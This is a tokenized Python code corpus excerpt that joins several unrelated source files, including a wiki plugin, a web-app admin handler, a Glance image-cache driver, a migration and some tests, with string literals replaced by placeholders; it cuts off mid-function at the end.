<s> """<STR_LIT>""" <EOL> import yaki . Engine , yaki . Store , yaki . Locale <EOL> from BeautifulSoup import * <EOL> from yaki . Utils import * <EOL> import urllib <EOL> class ReferrersWikiPlugin ( yaki . Plugins . WikiPlugin ) : <EOL> def __init__ ( self , registry , webapp ) : <EOL> registry . register ( '<STR_LIT>' , self , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . ac = webapp . getContext ( ) <EOL> self . i18n = yaki . Locale . i18n [ self . ac . locale ] <EOL> def run ( self , serial , tag , tagname , pagename , soup , request , response ) : <EOL> buffer = [ u'<STR_LIT>' % ( self . i18n [ '<STR_LIT>' ] , self . i18n [ '<STR_LIT>' ] , self . i18n [ '<STR_LIT>' ] , self . i18n [ '<STR_LIT>' ] ) ] <EOL> data = self . ac . referrers . getData ( ) <EOL> pages = data . keys ( ) <EOL> pages . sort ( lambda b , a : cmp ( data [ a ] [ '<STR_LIT>' ] , data [ b ] [ '<STR_LIT>' ] ) ) <EOL> for page in pages : <EOL> page = urllib . unquote ( page ) <EOL> try : <EOL> row = [ u'<STR_LIT>' % ( self . ac . base + page , self . i18n [ '<STR_LIT>' ] % timeSince ( self . i18n , data [ page ] [ '<STR_LIT>' ] ) , self . ac . indexer . pageinfo [ page ] [ '<STR_LIT:title>' ] , self . ac . indexer . pageinfo [ page ] [ '<STR_LIT>' ] ) ] <EOL> referrers = data [ page ] [ '<STR_LIT>' ] . keys ( ) <EOL> referrers . sort ( lambda b , a : cmp ( data [ page ] [ '<STR_LIT>' ] [ a ] [ '<STR_LIT>' ] , data [ page ] [ '<STR_LIT>' ] [ b ] [ '<STR_LIT>' ] ) ) <EOL> for referrer in referrers : <EOL> row . append ( u'<STR_LIT>' % ( referrer , self . i18n [ '<STR_LIT>' ] % timeSince ( self . i18n , data [ page ] [ '<STR_LIT>' ] [ referrer ] [ '<STR_LIT>' ] ) , shrink ( referrer , <NUM_LIT:50> ) , data [ page ] [ '<STR_LIT>' ] [ referrer ] [ '<STR_LIT:count>' ] ) ) <EOL> buffer . append ( u'<STR_LIT>' . join ( row ) [ : - <NUM_LIT:5> ] ) <EOL> buffer . append ( u'<STR_LIT>' ) <EOL> except : <EOL> print "<STR_LIT>" % page <EOL> pass <EOL> buffer . append ( u'<STR_LIT>' ) <EOL> tag . replaceWith ( u'<STR_LIT>' . join ( buffer ) ) </s>
<s> import cgi , urllib <EOL> from snakeserver . snakelet import Snakelet <EOL> import logging <EOL> log = logging . getLogger ( "<STR_LIT>" ) <EOL> class Manager ( Snakelet ) : <EOL> def getDescription ( self ) : <EOL> return "<STR_LIT>" <EOL> def requiresSession ( self ) : <EOL> return self . SESSION_LOGIN_REQUIRED <EOL> def serve ( self , request , response ) : <EOL> f = request . getForm ( ) <EOL> if f . has_key ( '<STR_LIT:action>' ) : <EOL> action = f [ '<STR_LIT:action>' ] <EOL> if action == '<STR_LIT>' : <EOL> out = response . getOutput ( ) <EOL> print >> out , '<STR_LIT>' <EOL> print >> out , "<STR_LIT>" <EOL> self . getWebApp ( ) . server . shutdown ( ) <EOL> return <EOL> elif action in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> name = f . get ( '<STR_LIT:name>' ) or "<STR_LIT>" <EOL> vhost = f [ '<STR_LIT>' ] <EOL> urlname = urllib . quote_plus ( name ) <EOL> if action == "<STR_LIT>" : <EOL> self . getWebApp ( ) . server . enableWebApp ( vhost , name , False ) <EOL> request . getContext ( ) . actionmsg = "<STR_LIT>" <EOL> if not self . getWebApp ( ) . isEnabled ( ) : <EOL> out = response . getOutput ( ) <EOL> print >> out , '<STR_LIT>' <EOL> print >> out , "<STR_LIT>" <EOL> return <EOL> elif action == "<STR_LIT>" : <EOL> self . getWebApp ( ) . server . enableWebApp ( vhost , name , True ) <EOL> request . getContext ( ) . actionmsg = "<STR_LIT>" <EOL> elif action == "<STR_LIT>" : <EOL> realname = f . get ( '<STR_LIT>' ) <EOL> if self . getWebApp ( ) . server . reloadWebApp ( vhost , name , realname ) : <EOL> request . getContext ( ) . actionmsg = "<STR_LIT>" <EOL> else : <EOL> request . getContext ( ) . actionmsg = "<STR_LIT>" <EOL> if not urlname : <EOL> self . redirect ( "<STR_LIT>" , request , response ) <EOL> return <EOL> elif action == "<STR_LIT>" : <EOL> self . getWebApp ( ) . server . clearWebAppCache ( vhost , name ) <EOL> request . getContext ( ) . actionmsg = "<STR_LIT>" <EOL> elif action == "<STR_LIT>" : <EOL> selfWebApp = self . getWebApp ( ) <EOL> destroyedSelf = ( vhost == selfWebApp . getVirtualHost ( ) [ <NUM_LIT:0> ] ) and ( name == selfWebApp . getURLprefix ( ) ) <EOL> log . info ( "<STR_LIT>" % ( name , vhost ) ) <EOL> selfWebApp . server . unloadWebApp ( vhost , name ) <EOL> if destroyedSelf : <EOL> out = response . getOutput ( ) <EOL> print >> out , '<STR_LIT>' <EOL> print >> out , "<STR_LIT>" <EOL> return <EOL> self . redirect ( selfWebApp . getURLprefix ( ) + "<STR_LIT>" , request , response ) <EOL> return <EOL> self . redirect ( "<STR_LIT>" + urlname , request , response ) <EOL> elif action == '<STR_LIT>' : <EOL> webapp = f [ '<STR_LIT>' ] <EOL> vhost = f [ '<STR_LIT>' ] <EOL> urlname = urllib . quote_plus ( webapp ) <EOL> sessionid = f [ '<STR_LIT:id>' ] <EOL> activesessions = self . getWebApp ( ) . server . allWebApps [ ( vhost , webapp ) ] . sessions <EOL> if sessionid == '<STR_LIT:all>' : <EOL> for ( sessionID , session ) in activesessions . items ( ) [ : ] : <EOL> log . info ( "<STR_LIT>" + sessionID ) <EOL> session . destroy ( external = True ) <EOL> del activesessions [ sessionID ] <EOL> else : <EOL> log . info ( "<STR_LIT>" + sessionid ) <EOL> activesessions [ sessionid ] . destroy ( external = True ) <EOL> del activesessions [ sessionid ] <EOL> self . redirect ( "<STR_LIT>" + urlname , request , response ) <EOL> else : <EOL> response . sendError ( <NUM_LIT> , "<STR_LIT>" ) <EOL> else : <EOL> self . redirect ( self . getWebApp ( ) . getURLprefix ( ) + "<STR_LIT>" , request , response ) </s>
<s> </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from contextlib import contextmanager <EOL> import datetime <EOL> import itertools <EOL> import logging <EOL> import os <EOL> import stat <EOL> import time <EOL> from eventlet import sleep , timeout <EOL> import sqlite3 <EOL> from glance . common import cfg <EOL> from glance . common import exception <EOL> from glance . image_cache . drivers import base <EOL> logger = logging . getLogger ( __name__ ) <EOL> DEFAULT_SQL_CALL_TIMEOUT = <NUM_LIT:2> <EOL> class SqliteConnection ( sqlite3 . Connection ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . timeout_seconds = kwargs . get ( '<STR_LIT>' , DEFAULT_SQL_CALL_TIMEOUT ) <EOL> kwargs [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> sqlite3 . Connection . __init__ ( self , * args , ** kwargs ) <EOL> def _timeout ( self , call ) : <EOL> with timeout . Timeout ( self . timeout_seconds ) : <EOL> while True : <EOL> try : <EOL> return call ( ) <EOL> except sqlite3 . OperationalError , e : <EOL> if '<STR_LIT>' not in str ( e ) : <EOL> raise <EOL> sleep ( <NUM_LIT> ) <EOL> def execute ( self , * args , ** kwargs ) : <EOL> return self . _timeout ( lambda : sqlite3 . Connection . execute ( <EOL> self , * args , ** kwargs ) ) <EOL> def commit ( self ) : <EOL> return self . _timeout ( lambda : sqlite3 . Connection . commit ( self ) ) <EOL> def dict_factory ( cur , row ) : <EOL> return dict ( <EOL> ( ( col [ <NUM_LIT:0> ] , row [ idx ] ) for idx , col in enumerate ( cur . description ) ) ) <EOL> class Driver ( base . Driver ) : <EOL> """<STR_LIT>""" <EOL> opts = [ <EOL> cfg . StrOpt ( '<STR_LIT>' , default = '<STR_LIT>' ) , <EOL> ] <EOL> def configure ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( Driver , self ) . configure ( ) <EOL> self . conf . register_opts ( self . opts ) <EOL> self . initialize_db ( ) <EOL> def initialize_db ( self ) : <EOL> db = self . conf . image_cache_sqlite_db <EOL> self . db_path = os . path . join ( self . base_dir , db ) <EOL> try : <EOL> conn = sqlite3 . connect ( self . db_path , check_same_thread = False , <EOL> factory = SqliteConnection ) <EOL> conn . executescript ( """<STR_LIT>""" ) <EOL> conn . close ( ) <EOL> except sqlite3 . DatabaseError , e : <EOL> msg = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % e <EOL> logger . error ( msg ) <EOL> raise exception . BadDriverConfiguration ( driver_name = '<STR_LIT>' , <EOL> reason = msg ) <EOL> def get_cache_size ( self ) : <EOL> """<STR_LIT>""" <EOL> sizes = [ ] <EOL> for path in self . get_cache_files ( self . base_dir ) : <EOL> if path == self . db_path : <EOL> continue <EOL> file_info = os . stat ( path ) <EOL> sizes . append ( file_info [ stat . ST_SIZE ] ) <EOL> return sum ( sizes ) <EOL> def get_hit_count ( self , image_id ) : <EOL> """<STR_LIT>""" <EOL> if not self . is_cached ( image_id ) : <EOL> return <NUM_LIT:0> <EOL> hits = <NUM_LIT:0> <EOL> with self . get_db ( ) as db : <EOL> cur = db . execute ( """<STR_LIT>""" , <EOL> ( image_id , ) ) <EOL> hits = cur . fetchone ( ) [ <NUM_LIT:0> ] <EOL> return hits <EOL> def get_cached_images ( self ) : <EOL> """<STR_LIT>""" <EOL> logger . debug ( _ ( "<STR_LIT>" ) ) <EOL> with self . get_db ( ) as db : <EOL> cur = db . execute ( """<STR_LIT>""" ) <EOL> cur . row_factory = dict_factory <EOL> return [ r for r in cur ] <EOL> def is_cached ( self , image_id ) : <EOL> """<STR_LIT>""" <EOL> return os . path . exists ( self . get_image_filepath ( image_id ) ) <EOL> def is_cacheable ( self , image_id ) : <EOL> """<STR_LIT>""" <EOL> return not ( self . is_cached ( image_id ) or <EOL> self . is_being_cached ( image_id ) ) <EOL> def is_being_cached ( self , image_id ) : <EOL> """<STR_LIT>""" <EOL> path = self . get_image_filepath ( image_id , '<STR_LIT>' ) <EOL> return os . path . exists ( path ) <EOL> def is_queued ( self , image_id ) : <EOL> """<STR_LIT>""" <EOL> path = self . get_image_filepath ( image_id , '<STR_LIT>' ) <EOL> return os . path . exists ( path ) <EOL> def delete_all_cached_images ( self ) : <EOL> """<STR_LIT>""" <EOL> deleted = <NUM_LIT:0> <EOL> with self . get_db ( ) as db : <EOL> for path in self . get_cache_files ( self . base_dir ) : <EOL> delete_cached_file ( path ) <EOL> deleted += <NUM_LIT:1> <EOL> db . execute ( """<STR_LIT>""" ) <EOL> db . commit ( ) <EOL> return deleted <EOL> def delete_cached_image ( self , image_id ) : <EOL> """<STR_LIT>""" <EOL> path = self . get_image_filepath ( image_id ) <EOL> with self . get_db ( ) as db : <EOL> delete_cached_file ( path ) <EOL> db . execute ( """<STR_LIT>""" , <EOL> ( image_id , ) ) <EOL> db . commit ( ) <EOL> def delete_all_queued_images ( self ) : <EOL> """<STR_LIT>""" <EOL> files = [ f for f in self . get_cache_files ( self . queue_dir ) ] <EOL> for file in files : <EOL> os . unlink ( file ) <EOL> return len ( files ) <EOL> def delete_queued_image ( self , image_id ) : <EOL> """<STR_LIT>""" <EOL> path = self . get_image_filepath ( image_id , '<STR_LIT>' ) <EOL> if os . path . exists ( path ) : <EOL> os . unlink ( path ) <EOL> def clean ( self , stall_time = None ) : <EOL> """<STR_LIT>""" <EOL> self . delete_invalid_files ( ) <EOL> if stall_time is None : <EOL> stall_time = self . conf . image_cache_stall_time <EOL> now = time . time ( ) <EOL> older_than = now - stall_time <EOL> self . delete_stalled_files ( older_than ) <EOL> def get_least_recently_accessed ( self ) : <EOL> """<STR_LIT>""" <EOL> with self . get_db ( ) as db : <EOL> cur = db . execute ( """<STR_LIT>""" ) <EOL> image_id = cur . fetchone ( ) [ <NUM_LIT:0> ] <EOL> path = self . get_image_filepath ( image_id ) <EOL> file_info = os . stat ( path ) <EOL> return image_id , file_info [ stat . ST_SIZE ] <EOL> @ contextmanager <EOL> def open_for_write ( self , image_id ) : <EOL> """<STR_LIT>""" <EOL> incomplete_path = self . get_image_filepath ( image_id , '<STR_LIT>' ) <EOL> def commit ( ) : <EOL> with self . get_db ( ) as db : <EOL> final_path = self . get_image_filepath ( image_id ) <EOL> logger . debug ( _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> dict ( incomplete_path = incomplete_path , <EOL> final_path = final_path ) ) <EOL> os . rename ( incomplete_path , final_path ) <EOL> if self . is_queued ( image_id ) : <EOL> os . unlink ( self . get_image_filepath ( image_id , '<STR_LIT>' ) ) <EOL> filesize = os . path . getsize ( final_path ) <EOL> now = time . time ( ) <EOL> db . execute ( """<STR_LIT>""" , <EOL> ( image_id , now , filesize ) ) <EOL> db . commit ( ) <EOL> def rollback ( e ) : <EOL> with self . get_db ( ) as db : <EOL> if os . path . exists ( incomplete_path ) : <EOL> invalid_path = self . get_image_filepath ( image_id , '<STR_LIT>' ) <EOL> logger . debug ( _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) % locals ( ) ) <EOL> os . rename ( incomplete_path , invalid_path ) <EOL> db . execute ( """<STR_LIT>""" , ( image_id , ) ) <EOL> db . commit ( ) <EOL> try : <EOL> with open ( incomplete_path , '<STR_LIT:wb>' ) as cache_file : <EOL> yield cache_file <EOL> except Exception as e : <EOL> rollback ( e ) <EOL> raise <EOL> else : <EOL> commit ( ) <EOL> @ contextmanager <EOL> def open_for_read ( self , image_id ) : <EOL> """<STR_LIT>""" <EOL> path = self . get_image_filepath ( image_id ) <EOL> with open ( path , '<STR_LIT:rb>' ) as cache_file : <EOL> yield cache_file <EOL> now = time . time ( ) <EOL> with self . get_db ( ) as db : <EOL> db . execute ( """<STR_LIT>""" , <EOL> ( now , image_id ) ) <EOL> db . commit ( ) <EOL> @ contextmanager <EOL> def get_db ( self ) : <EOL> """<STR_LIT>""" <EOL> conn = sqlite3 . connect ( self . db_path , check_same_thread = False , <EOL> factory = SqliteConnection ) <EOL> conn . row_factory = sqlite3 . Row <EOL> conn . text_factory = str <EOL> conn . execute ( '<STR_LIT>' ) <EOL> conn . execute ( '<STR_LIT>' ) <EOL> conn . execute ( '<STR_LIT>' ) <EOL> try : <EOL> yield conn <EOL> except sqlite3 . DatabaseError , e : <EOL> msg = _ ( "<STR_LIT>" ) % e <EOL> logger . error ( msg ) <EOL> conn . rollback ( ) <EOL> finally : <EOL> conn . close ( ) <EOL> def queue_image ( self , image_id ) : <EOL> """<STR_LIT>""" <EOL> if self . is_cached ( image_id ) : <EOL> msg = _ ( "<STR_LIT>" ) % image_id <EOL> logger . warn ( msg ) <EOL> return False <EOL> if self . is_being_cached ( image_id ) : <EOL> msg = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % image_id <EOL> logger . warn ( msg ) <EOL> return False <EOL> if self . is_queued ( image_id ) : <EOL> msg = _ ( "<STR_LIT>" ) % image_id <EOL> logger . warn ( msg ) <EOL> return False <EOL> path = self . get_image_filepath ( image_id , '<STR_LIT>' ) <EOL> with open ( path , "<STR_LIT:w>" ) as f : <EOL> pass <EOL> return True <EOL> def delete_invalid_files ( self ) : <EOL> """<STR_LIT>""" <EOL> for path in self . get_cache_files ( self . invalid_dir ) : <EOL> os . unlink ( path ) <EOL> logger . info ( "<STR_LIT>" , path ) <EOL> def delete_stalled_files ( self , older_than ) : <EOL> """<STR_LIT>""" <EOL> for path in self . get_cache_files ( self . incomplete_dir ) : <EOL> os . unlink ( path ) <EOL> logger . info ( "<STR_LIT>" , path ) <EOL> def get_queued_images ( self ) : <EOL> """<STR_LIT>""" <EOL> files = [ f for f in self . get_cache_files ( self . queue_dir ) ] <EOL> items = [ ] <EOL> for path in files : <EOL> mtime = os . path . getmtime ( path ) <EOL> items . append ( ( mtime , os . path . basename ( path ) ) ) <EOL> items . sort ( ) <EOL> return [ image_id for ( mtime , image_id ) in items ] <EOL> def get_cache_files ( self , basepath ) : <EOL> """<STR_LIT>""" <EOL> for fname in os . listdir ( basepath ) : <EOL> path = os . path . join ( basepath , fname ) <EOL> if path != self . db_path and os . path . isfile ( path ) : <EOL> yield path <EOL> def delete_cached_file ( path ) : <EOL> if os . path . exists ( path ) : <EOL> logger . debug ( _ ( "<STR_LIT>" ) , path ) <EOL> os . unlink ( path ) <EOL> else : <EOL> logger . warn ( _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , path ) </s>
<s> from migrate . changeset import * <EOL> from sqlalchemy import * <EOL> from sqlalchemy . sql import and_ , not_ <EOL> from glance . registry . db . migrate_repo . schema import ( <EOL> Boolean , DateTime , BigInteger , Integer , String , <EOL> Text , from_migration_import ) <EOL> def get_images_table ( meta ) : <EOL> """<STR_LIT>""" <EOL> images = Table ( '<STR_LIT>' , meta , <EOL> Column ( '<STR_LIT:id>' , Integer ( ) , primary_key = True , nullable = False ) , <EOL> Column ( '<STR_LIT:name>' , String ( <NUM_LIT:255> ) ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:20> ) ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:20> ) ) , <EOL> Column ( '<STR_LIT:size>' , BigInteger ( ) ) , <EOL> Column ( '<STR_LIT:status>' , String ( <NUM_LIT:30> ) , nullable = False ) , <EOL> Column ( '<STR_LIT>' , Boolean ( ) , nullable = False , default = False , <EOL> index = True ) , <EOL> Column ( '<STR_LIT:location>' , Text ( ) ) , <EOL> Column ( '<STR_LIT>' , DateTime ( ) , nullable = False ) , <EOL> Column ( '<STR_LIT>' , DateTime ( ) ) , <EOL> Column ( '<STR_LIT>' , DateTime ( ) ) , <EOL> Column ( '<STR_LIT>' , Boolean ( ) , nullable = False , default = False , <EOL> index = True ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:32> ) ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:255> ) ) , <EOL> mysql_engine = '<STR_LIT>' , <EOL> useexisting = True ) <EOL> return images <EOL> def get_image_properties_table ( meta ) : <EOL> """<STR_LIT>""" <EOL> ( get_image_properties_table , ) = from_migration_import ( <EOL> '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> image_properties = get_image_properties_table ( meta ) <EOL> return image_properties <EOL> def upgrade ( migrate_engine ) : <EOL> meta = MetaData ( ) <EOL> meta . bind = migrate_engine <EOL> images = get_images_table ( meta ) <EOL> owner = Column ( '<STR_LIT>' , String ( <NUM_LIT:255> ) ) <EOL> owner . create ( images ) <EOL> def downgrade ( migrate_engine ) : <EOL> meta = MetaData ( ) <EOL> meta . bind = migrate_engine <EOL> images = get_images_table ( meta ) <EOL> images . columns [ '<STR_LIT>' ] . drop ( ) </s>
<s> """<STR_LIT>""" <EOL> import eventlet . patcher <EOL> import webob . dec <EOL> import webob . exc <EOL> from glance . common import client <EOL> from glance . common import exception <EOL> from glance . common import wsgi <EOL> from glance . tests import functional <EOL> from glance . tests import utils <EOL> eventlet . patcher . monkey_patch ( socket = True ) <EOL> class RedirectTestApp ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name ) : <EOL> """<STR_LIT>""" <EOL> self . name = name <EOL> @ webob . dec . wsgify <EOL> def __call__ ( self , request ) : <EOL> """<STR_LIT>""" <EOL> base = "<STR_LIT>" % request . host <EOL> path = request . path_qs <EOL> if path == "<STR_LIT:/>" : <EOL> return "<STR_LIT:root>" <EOL> elif path == "<STR_LIT>" : <EOL> url = "<STR_LIT>" % base <EOL> raise webob . exc . HTTPFound ( location = url ) <EOL> elif path == "<STR_LIT>" : <EOL> url = "<STR_LIT>" % base <EOL> raise webob . exc . HTTPFound ( location = url ) <EOL> elif path == "<STR_LIT>" : <EOL> raise webob . exc . HTTPFound ( location = request . url ) <EOL> elif path . startswith ( "<STR_LIT>" ) : <EOL> url = "<STR_LIT>" % path . split ( "<STR_LIT:->" ) [ - <NUM_LIT:1> ] <EOL> raise webob . exc . HTTPFound ( location = url ) <EOL> elif path == "<STR_LIT>" : <EOL> return "<STR_LIT>" % self . name <EOL> elif path == "<STR_LIT>" : <EOL> return "<STR_LIT>" <EOL> return "<STR_LIT>" <EOL> class TestClientRedirects ( functional . FunctionalTest ) : <EOL> def setUp ( self ) : <EOL> super ( TestClientRedirects , self ) . setUp ( ) <EOL> self . port_one = utils . get_unused_port ( ) <EOL> self . port_two = utils . get_unused_port ( ) <EOL> server_one = wsgi . Server ( ) <EOL> server_two = wsgi . Server ( ) <EOL> conf = utils . TestConfigOpts ( { '<STR_LIT>' : '<STR_LIT:127.0.0.1>' } ) <EOL> server_one . start ( RedirectTestApp ( "<STR_LIT>" ) , conf , self . port_one ) <EOL> server_two . start ( RedirectTestApp ( "<STR_LIT>" ) , conf , self . port_two ) <EOL> self . client = client . BaseClient ( "<STR_LIT:127.0.0.1>" , self . port_one ) <EOL> def test_get_without_redirect ( self ) : <EOL> """<STR_LIT>""" <EOL> response = self . client . do_request ( "<STR_LIT:GET>" , "<STR_LIT:/>" ) <EOL> self . assertEquals ( <NUM_LIT:200> , response . status ) <EOL> self . assertEquals ( "<STR_LIT:root>" , response . read ( ) ) <EOL> def test_get_with_one_redirect ( self ) : <EOL> """<STR_LIT>""" <EOL> response = self . client . do_request ( "<STR_LIT:GET>" , "<STR_LIT>" ) <EOL> self . assertEquals ( <NUM_LIT:200> , response . status ) <EOL> self . assertEquals ( "<STR_LIT>" , response . read ( ) ) <EOL> def test_get_with_one_redirect_query_string ( self ) : <EOL> """<STR_LIT>""" <EOL> response = self . client . do_request ( "<STR_LIT:GET>" , "<STR_LIT>" ) <EOL> self . assertEquals ( <NUM_LIT:200> , response . status ) <EOL> self . assertEquals ( "<STR_LIT>" , response . read ( ) ) <EOL> def test_get_with_max_redirects ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( exception . MaxRedirectsExceeded , <EOL> self . client . do_request , <EOL> "<STR_LIT:GET>" , <EOL> "<STR_LIT>" ) <EOL> def test_post_redirect ( self ) : <EOL> """<STR_LIT>""" <EOL> response = self . client . do_request ( "<STR_LIT:POST>" , "<STR_LIT>" ) <EOL> self . assertEquals ( <NUM_LIT:200> , response . status ) <EOL> self . assertEquals ( "<STR_LIT>" , response . read ( ) ) <EOL> def test_redirect_to_new_host ( self ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" % self . port_two <EOL> response = self . client . do_request ( "<STR_LIT:POST>" , url ) <EOL> self . assertEquals ( <NUM_LIT:200> , response . status ) <EOL> self . assertEquals ( "<STR_LIT>" , response . read ( ) ) <EOL> response = self . client . do_request ( "<STR_LIT:POST>" , "<STR_LIT>" ) <EOL> self . assertEquals ( <NUM_LIT:200> , response . status ) <EOL> self . assertEquals ( "<STR_LIT>" , response . read ( ) ) </s>
<s> import os <EOL> import commands <EOL> import datetime <EOL> import re <EOL> import unittest <EOL> from glance . common import crypt <EOL> from glance . common import exception <EOL> from glance . common import utils <EOL> def parse_mailmap ( mailmap = '<STR_LIT>' ) : <EOL> mapping = { } <EOL> if os . path . exists ( mailmap ) : <EOL> fp = open ( mailmap , '<STR_LIT:r>' ) <EOL> for l in fp : <EOL> l = l . strip ( ) <EOL> if not l . startswith ( '<STR_LIT:#>' ) and '<STR_LIT:U+0020>' in l : <EOL> canonical_email , alias = l . split ( '<STR_LIT:U+0020>' ) <EOL> mapping [ alias ] = canonical_email <EOL> return mapping <EOL> def str_dict_replace ( s , mapping ) : <EOL> for s1 , s2 in mapping . iteritems ( ) : <EOL> s = s . replace ( s1 , s2 ) <EOL> return s <EOL> class AuthorsTestCase ( unittest . TestCase ) : <EOL> def test_authors_up_to_date ( self ) : <EOL> topdir = os . path . normpath ( os . path . dirname ( __file__ ) + '<STR_LIT>' ) <EOL> contributors = set ( ) <EOL> missing = set ( ) <EOL> authors_file = open ( os . path . join ( topdir , '<STR_LIT>' ) , '<STR_LIT:r>' ) . read ( ) <EOL> if os . path . exists ( os . path . join ( topdir , '<STR_LIT>' ) ) : <EOL> mailmap = parse_mailmap ( os . path . join ( topdir , '<STR_LIT>' ) ) <EOL> for email in commands . getoutput ( '<STR_LIT>' ) . split ( ) : <EOL> if not email : <EOL> continue <EOL> if "<STR_LIT>" in email and "<STR_LIT>" in email : <EOL> continue <EOL> email = '<STR_LIT:<>' + email + '<STR_LIT:>>' <EOL> contributors . add ( str_dict_replace ( email , mailmap ) ) <EOL> for contributor in contributors : <EOL> if contributor == '<STR_LIT>' : <EOL> continue <EOL> if not contributor in authors_file : <EOL> missing . add ( contributor ) <EOL> self . assertTrue ( len ( missing ) == <NUM_LIT:0> , <EOL> '<STR_LIT>' % missing ) <EOL> class UtilsTestCase ( unittest . TestCase ) : <EOL> def test_bool_from_string ( self ) : <EOL> true_values = [ '<STR_LIT:True>' , True , '<STR_LIT:true>' , '<STR_LIT>' , '<STR_LIT:1>' , <NUM_LIT:1> , '<STR_LIT>' , '<STR_LIT>' ] <EOL> i = <NUM_LIT:0> <EOL> for value in true_values : <EOL> self . assertTrue ( utils . bool_from_string ( value ) , <EOL> "<STR_LIT>" % ( value , i ) ) <EOL> i = i + <NUM_LIT:1> <EOL> false_values = [ '<STR_LIT:False>' , False , '<STR_LIT:false>' , '<STR_LIT:T>' , '<STR_LIT:F>' , '<STR_LIT>' , <EOL> '<STR_LIT:0>' , <NUM_LIT:0> , <NUM_LIT:9> , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for value in false_values : <EOL> self . assertFalse ( utils . bool_from_string ( value ) , <EOL> "<STR_LIT>" % value ) <EOL> def test_import_class_or_object ( self ) : <EOL> self . assertRaises ( exception . ImportFailure , utils . import_class , <EOL> '<STR_LIT>' ) <EOL> self . assertRaises ( exception . ImportFailure , utils . import_class , <EOL> '<STR_LIT>' ) <EOL> self . assertRaises ( exception . ImportFailure , utils . import_class , <EOL> '<STR_LIT>' ) <EOL> self . assertRaises ( exception . ImportFailure , utils . import_object , <EOL> '<STR_LIT>' ) <EOL> store_class = utils . import_class ( '<STR_LIT>' ) <EOL> self . assertTrue ( store_class . __name__ == '<STR_LIT>' ) <EOL> ex_obj = utils . import_object ( '<STR_LIT>' ) <EOL> self . assertTrue ( ex_obj . __class__ . __name__ == '<STR_LIT>' ) <EOL> module_obj = utils . import_object ( '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , module_obj . __package__ ) <EOL> def test_isotime ( self ) : <EOL> dt1 = datetime . datetime ( <NUM_LIT> , <NUM_LIT:11> , <NUM_LIT:10> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) <EOL> self . assertEqual ( '<STR_LIT>' , utils . isotime ( dt1 ) ) <EOL> iso_re = re . compile ( r'<STR_LIT>' ) <EOL> now_iso = utils . isotime ( ) <EOL> self . assertTrue ( iso_re . match ( now_iso ) is not None ) <EOL> def test_encryption ( self ) : <EOL> key_list = [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> plaintext_list = [ '<STR_LIT>' ] <EOL> blocksize = <NUM_LIT:64> <EOL> for i in range ( <NUM_LIT:3> * blocksize ) : <EOL> plaintext_list . append ( os . urandom ( i ) ) <EOL> for key in key_list : <EOL> for plaintext in plaintext_list : <EOL> ciphertext = crypt . urlsafe_encrypt ( key , plaintext , blocksize ) <EOL> self . assertTrue ( ciphertext != plaintext ) <EOL> text = crypt . urlsafe_decrypt ( key , ciphertext ) <EOL> self . assertTrue ( plaintext == text ) </s>
<s> import opencenter <EOL> import string <EOL> class NovaBackend ( opencenter . backends . Backend ) : <EOL> def __init__ ( self ) : <EOL> super ( NovaBackend , self ) . __init__ ( __file__ ) <EOL> def additional_constraints ( self , api , node_id , action , ns ) : <EOL> return [ ] <EOL> def _make_subcontainer ( self , api , name , parent_id , facts , backends , <EOL> attrs = None ) : <EOL> subcontainer = api . _model_create ( '<STR_LIT>' , { '<STR_LIT:name>' : name } ) <EOL> if subcontainer is None : <EOL> return None <EOL> if attrs is None : <EOL> attrs = { } <EOL> if facts is None : <EOL> facts = { } <EOL> facts . update ( { '<STR_LIT>' : parent_id , <EOL> '<STR_LIT>' : backends } ) <EOL> data = { } <EOL> data [ '<STR_LIT>' ] = facts <EOL> data [ '<STR_LIT>' ] = attrs <EOL> for t in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> for k , v in data [ t ] . items ( ) : <EOL> d = { '<STR_LIT:key>' : k , <EOL> '<STR_LIT:value>' : v , <EOL> '<STR_LIT>' : subcontainer [ '<STR_LIT:id>' ] } <EOL> api . _model_create ( t , d ) <EOL> return subcontainer <EOL> def create_az ( self , state_data , api , node_id , ** kwargs ) : <EOL> if not '<STR_LIT>' in kwargs : <EOL> return self . _fail ( msg = '<STR_LIT>' ) <EOL> valid = string . letters + string . digits + "<STR_LIT:_>" <EOL> test_valid = all ( [ c in valid for c in kwargs [ '<STR_LIT>' ] ] ) <EOL> if not test_valid : <EOL> return self . _fail ( msg = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> r = api . nodes_query ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( <EOL> node_id , kwargs [ '<STR_LIT>' ] ) ) <EOL> if len ( r ) > <NUM_LIT:0> : <EOL> return self . _fail ( msg = '<STR_LIT>' ) <EOL> self . _make_subcontainer ( api , <EOL> '<STR_LIT>' % kwargs [ '<STR_LIT>' ] , <EOL> node_id , <EOL> { '<STR_LIT>' : kwargs [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : kwargs [ '<STR_LIT>' ] } , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> return self . _ok ( ) <EOL> def create_cluster ( self , state_data , api , 